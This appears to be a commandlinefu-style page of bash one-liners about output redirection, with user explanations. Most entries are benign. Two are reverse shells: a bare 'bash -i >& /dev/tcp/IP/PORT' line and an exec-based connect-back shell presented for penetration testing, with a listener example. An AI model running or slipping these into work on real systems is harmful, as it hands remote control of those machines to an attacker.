Terminal - Commands tagged redirecting output - 11 results
less file.lst | head -n 50000 > output.txt
2011-09-05 05:26:04
User: Richie086
Functions: head less
-3

Useful for situations where you have word lists or dictionaries that range from hundreds of megabytes to several gigabytes in size. Replace file.lst with your wordlist, replace 50000 with however many lines you want the resulting list to be in total. The result will be redirected to output.txt in the current working directory. It may be helpful to run wc -l file.lst to find out how many lines the word list is first, then divide that in half to figure out what value to put for the head -n part of the command.
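
A minimal sketch of the workflow described above (file.lst and the 100000-line count are only illustrative; head can also read the file directly, without less):

wc -l file.lst                        # e.g. reports 100000 file.lst
head -n 50000 file.lst > output.txt   # keep the first half of the list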

command >&-
<COMMAND> |:
2011-08-28 23:48:29
User: h3xx
25

This is shorter and actually much faster than >/dev/null (see sample output for timings)

Plus, it looks like a disappointed face emoticon.
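
A rough way to reproduce the comparison (seq is only a stand-in for a chatty command; timings will vary):

time seq 1000000 > /dev/null   # classic: discard output via /dev/null
time seq 1000000 | :           # pipe into the ':' no-op builtin; the writer may be killed early by SIGPIPE
time seq 1000000 >&-           # close stdout; note that some programs report a write error when stdout is closed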

{ command1 args1 ; command2 args2 ; ... }
2011-04-12 20:01:51
User: IF_Rock
0

{ ... } groups the commands in the current shell, whereas ( ... ) spawns a subshell, so braces keep the process count down.

Typically, I use this grouping to redirect a series of commands to a pipe -- { command1 args1 ; command2 args2 ; } | less -- or to a file -- { command1 args1 ; command2 args2 ; } > foo -- or to spawn the series as a background process -- { ... } & .
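
A small sketch of each pattern (the file names and commands are arbitrary):

{ echo "first"; echo "second"; } > combined.txt   # one redirection for the whole group, no subshell
{ date; uptime; } | less                          # pipe the combined output of several commands
{ sleep 2; echo "group done"; } &                 # run the whole group in the background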

bash -i >& /dev/tcp/IP/PORT 0>&1
<command> 2> <file>
TIME=$( { time YOUR_COMMAND_HERE; } 2>&1 ) ; echo $TIME
2010-11-18 15:48:05
User: allrightname
Functions: echo time
1

I've had a horrible time trying to pipe the output of shell built-ins like 'time' to other programs. The 'time' keyword writes its report to the shell's stderr rather than the command's, so a redirection on the command itself won't capture it; wrapping the call in { ... ; } 2>&1 inside a command substitution, as above, lets you pipe the report to something else.
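
A minimal sketch, using sleep as a stand-in for the command you actually want to time:

TIME=$( { time sleep 1; } 2>&1 )
echo "$TIME" | grep real   # pick out just the wall-clock line, for example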

exec 2>&1
2010-08-05 08:24:18
User: redy
Functions: exec
9

You have a script where =ALL= STDERR should be redirected to STDOUT and you don't want to add "2>&1" at the end of each command...

e.g.:

ls -al /foo/bar 2>&1

Then just add this piece of code at the beginning of your script!

I hope this can help someone. :)
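
A minimal script sketch showing the effect (the path is hypothetical):

#!/bin/bash
exec 2>&1            # from here on, every command's stderr is sent to stdout
ls /no/such/dir      # this error message now arrives on stdout too
echo "script continues"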

exec 0</dev/tcp/hostname/port; exec 1>&0; exec 2>&0; exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0
2010-03-18 17:25:08
User: truemilk
Functions: exec
2

Connect-back shell using Bash built-ins. Useful in a web app penetration test, if it's the case of a locked down environment, without the need for file uploads or a writable directory.

--

/dev/tcp and /dev/udp redirects must be enabled at compile time in Bash.

Most Linux distros enable this feature by default, but at least Debian is known to disable it.

--

http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/
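
A usage sketch (the address and port are hypothetical; depending on your netcat implementation the listener may be "nc -l 4444" instead):

nc -l -p 4444   # on the machine that should receive the shell, start a listener first

# on the target, substitute the listener's address and port:
exec 0</dev/tcp/192.0.2.10/4444; exec 1>&0; exec 2>&0; exec /bin/sh 0</dev/tcp/192.0.2.10/4444 1>&0 2>&0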

some_command > >(/bin/cmd_for_stdout) 2> >(/bin/cmd_for_stderr)
2009-12-01 03:58:04
User: tylerl
25

You can combine [n]> with process substitution >(cmd) to feed each output file descriptor into a different command.
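
A small sketch, assuming a helper function that writes to both streams (the log file names are arbitrary):

demo() { echo "normal output"; echo "error output" >&2; }
demo > >(sed 's/^/OUT: /' > stdout.log) 2> >(sed 's/^/ERR: /' > stderr.log)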

S=$SSH_TTY && (sleep 3 && echo -n 'Peace... '>$S & ) && (sleep 5 && echo -n 'Love... '>$S & ) && (sleep 7 && echo 'and Intergalactic Happiness!'>$S & )
2009-08-19 07:57:16
User: AskApache
Functions: echo sleep
-2

Ummmm.. Saw that gem on some dead-head hippie's VW bus at Phish this summer. It's actually one of my favorite ways of using bash, very clean. It shows what you can do with cool advanced features like job control, redirection, and combining commands that don't wait for each other. The thing I like most is the use of ( ) to build the process hierarchy shown below, which comes in very handy when using FIFOs to optimize your scripts or commands with similar acrobatics.

F UID    PID   PPID  WCHAN RSS  PSR CMD
1 gplovr 30667     1 wait  1324   1 -bash
0 gplovr 30672 30667 -      516   3  \_ sleep 3
1 gplovr 30669     1 wait  1324   1 -bash
0 gplovr 30673 30669 -      516   0  \_ sleep 5
1 gplovr 30671     1 wait  1324   1 -bash
0 gplovr 30674 30671 -      516   1  \_ sleep 7
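
A shorter variant of the same idea, using $(tty) so it also works outside an SSH session (the messages are placeholders):

T=$(tty) && (sleep 2 && echo 'first' > "$T" &) && (sleep 4 && echo 'second' > "$T" &)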